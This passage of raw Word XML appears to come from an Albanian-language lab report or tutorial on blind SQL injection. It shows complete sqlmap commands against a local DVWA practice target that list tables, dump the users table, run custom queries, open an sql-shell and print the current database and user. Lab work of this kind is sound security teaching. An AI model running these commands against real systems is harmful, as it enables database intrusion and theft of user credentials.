          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E142874" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3A8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id -D dvwa --tables --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A3E72" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C24EE26" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:r>
        <w:t>Rezulatet mund te shihen në figurën 13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027B686" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044C206C" wp14:editId="117C0DD4">
            <wp:extent cx="3995928" cy="46634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95928" cy="4663440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D901C0" w14:textId="7769836B" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc91427383"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i tabelave BSI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="082EA7B2" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="2F75B526" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:r>
        <w:t xml:space="preserve">Pas kësaj targetojmë tabelën users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D47BE" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="56BCB504" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3A8D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id -T users --batch --threads 5 --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827ECC4" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="20CC4539" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–threads </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> përcakton se sa threads të përdoren për ekzekutimin e komandës, në mënyrë që të ekzekutohet më shpejt. Rezultatet mund të shihen në figurën 14.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1E1D0" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76ED2CF3" wp14:editId="4A6700C9">
            <wp:extent cx="4572000" cy="3584448"/>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584448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16581C19" w14:textId="763376A9" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc91427384"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i të dhënave të tabelës users BSI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="5A51DB36" w14:textId="77777777" w:rsidR="00FB3A8D" w:rsidRDefault="00FB3A8D" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="4E483996" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="1AC8D0D4" w14:textId="39F24E46" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="00FB3A8D">
      <w:r>
        <w:t>Përveq nxjerrjes së të dhënave në mënyrë automatike, me veglën sqlmap mund të ekzekutojmë edhe query të shkruar nga ne. Komanda në vazhdim e demonstron këtë veti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB1B8CF" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="00FB3A8D"/>
    <w:p w14:paraId="5B183C36" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E07AC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id --sql-query="Select * from guestbook"  --batch --threads 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB237E" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1258E3E0" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D334ED8" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC"/>
    <w:p w14:paraId="17E0013D" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–sql-query </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> përcakton pyetësorin (query) që dëshirojmë të ekzekutojmë pas injektimit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B90F8" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:r>
        <w:t>Rezultatet mund te shihen në figurën 15.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF64717" w14:textId="77777777" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DBE37F0" wp14:editId="252DCF5E">
            <wp:extent cx="4572000" cy="3584448"/>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584448"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C3DA0D" w14:textId="2003D81C" w:rsidR="008E07AC" w:rsidRDefault="008E07AC" w:rsidP="008E07AC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc91427385"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Rezulatet e ekzekutimit të custom query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="7210082D" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0"/>
    <w:p w14:paraId="38966849" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0"/>
    <w:p w14:paraId="1525D223" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:r>
        <w:t>Një ndër vetit më të avancuara të veglës sqlmap është sql-shell.  Kjo na mundëson që pas injektimit me sql injection të krijojmë një shell në databazën e sulmuar . Pas krijimit të shellit mund të ekzekutojmë komanda në vazhdimësi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA89C54" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0"/>
    <w:p w14:paraId="3B606F80" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A602F0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id --sql-shell  --batch --threads 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E17B67" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B4E37C" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0"/>
    <w:p w14:paraId="30556EA7" w14:textId="7B4FF176" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:r>
        <w:t xml:space="preserve">Parametri  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">--sql-shell </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e udhëzon veglën që pas injektimi të krijoj një  shellin për  të cilin u diskutua më lart. Rezulatet mund të shihen në figurat 16 dhe 17.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CCDBF" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0"/>
    <w:p w14:paraId="4AAB0C33" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F48CFEB" wp14:editId="1C0CF9E5">
            <wp:extent cx="4572000" cy="3054096"/>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p>
    <w:p w14:paraId="770B08C9" w14:textId="5E15B55A" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc91427386"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Krijimi  i sql-shel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidR="00BF613E">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73753843" w14:textId="77777777" w:rsidR="00A602F0" w:rsidRDefault="00A602F0" w:rsidP="00A602F0">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D351706" w14:textId="77777777" w:rsidR="007344BE" w:rsidRDefault="00A602F0" w:rsidP="007344BE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D578DB5" wp14:editId="32158CB0">
            <wp:extent cx="4572000" cy="3054096"/>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p>
    <w:p w14:paraId="57F3F9FD" w14:textId="0CD70959" w:rsidR="00A602F0" w:rsidRDefault="007344BE" w:rsidP="007344BE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc91427387"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ekzekutimi i queries përmes sql-shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6FD0B3E7" w14:textId="3492AABE" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE"/>
    <w:p w14:paraId="79ACFE61" w14:textId="2458EFAD" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE">
      <w:r>
        <w:t>Meqenëse sqlmap është një vegël e cila ka shumë komanda dhe mundësi, ne do të i shqyrtojmë edhe dy komdanda të dobishme ndihmëse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112211DB" w14:textId="2BA4C1EC" w:rsidR="00A602F0" w:rsidRDefault="007344BE" w:rsidP="007344BE">
      <w:r>
        <w:t>Në rastin kur në serverin të cilin po e sulmojmë ka shumë databaza te hostuara, atëherë është e dobishme të dijmë se cila i takon aplikacionit të cilin po e sulmojmë aktualisht. Për këtë na shërben komanda në vijim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB047C2" w14:textId="07BDD331" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE"/>
    <w:p w14:paraId="185BBFFE" w14:textId="77777777" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE"/>
    <w:p w14:paraId="06204F41" w14:textId="77777777" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE"/>
    <w:p w14:paraId="474EB416" w14:textId="77777777" w:rsidR="007344BE" w:rsidRDefault="007344BE" w:rsidP="007344BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007344BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id </w:t>
      </w:r>
      <w:r w:rsidR="00873C59" w:rsidRPr="00873C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--current-</w:t>
      </w:r>
      <w:r w:rsidR="00873C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">db </w:t>
      </w:r>
      <w:r w:rsidRPr="007344BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--batch --threads 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DBE2C" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="007344BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A39BAD7" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="007344BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B81F121" w14:textId="71D3A2F0" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:r>
        <w:t xml:space="preserve">Parametri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">–current-db </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  udhëzon veglën të printoj databazën aktuale që përdoret nga aplikacioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1EC2C7" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59"/>
    <w:p w14:paraId="60B87075" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A6E20F" wp14:editId="059CF79B">
            <wp:extent cx="4572000" cy="3054096"/>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p>
    <w:p w14:paraId="3C9D287C" w14:textId="5488B8CB" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc91427388"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i databazës aktuale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="138CEEA7" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59"/>
    <w:p w14:paraId="61399106" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:r>
        <w:t>Për të ditur userin aktual përmes të cilit janë duke u ekzekutuar queryt, përdorim komandën në viijim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034716E4" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59"/>
    <w:p w14:paraId="53AD7FE7" w14:textId="6EEA012E" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007344BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://127.0.0.1/vulnerabilities/sqli_blind/" --cookie="PHPSESSID=fm26ua9o028nr1sa4a18qm8pf6; security=medium" --data="id=1&amp;Submit=Submit" -p id </w:t>
      </w:r>
      <w:r w:rsidRPr="00873C59">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--current-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007344BE">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--batch --threads 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAE0045" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59"/>
    <w:p w14:paraId="41CC7E66" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59"/>
    <w:p w14:paraId="45187E6D" w14:textId="77777777" w:rsidR="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12817ACB" wp14:editId="37C3E7D4">
            <wp:extent cx="4572000" cy="3054096"/>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p>
    <w:p w14:paraId="65FE6DF7" w14:textId="6ECCAC28" w:rsidR="00873C59" w:rsidRPr="00873C59" w:rsidRDefault="00873C59" w:rsidP="00873C59">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00873C59" w:rsidRPr="00873C59">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1380" w:right="1320" w:bottom="920" w:left="1220" w:header="727" w:footer="739" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc91427389"/>
      <w:r>
        <w:t xml:space="preserve">Figura </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Printimi i userit aktual të databazës</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="27318872" w14:textId="0F733D94" w:rsidR="003A6E31" w:rsidRDefault="003A6E31" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BCF32" w14:textId="324C43EC" w:rsidR="003A6E31" w:rsidRDefault="003A6E31" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C19D2F" w14:textId="77777777" w:rsidR="009C0AEA" w:rsidRDefault="009C0AEA" w:rsidP="000C31F5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AD84BA" w14:textId="111CECDA" w:rsidR="009C0AEA" w:rsidRPr="009321AD" w:rsidRDefault="003B7A3C" w:rsidP="00D74F62">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1299"/>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_TOC_250001"/>
      <w:bookmarkEnd w:id="32"/>
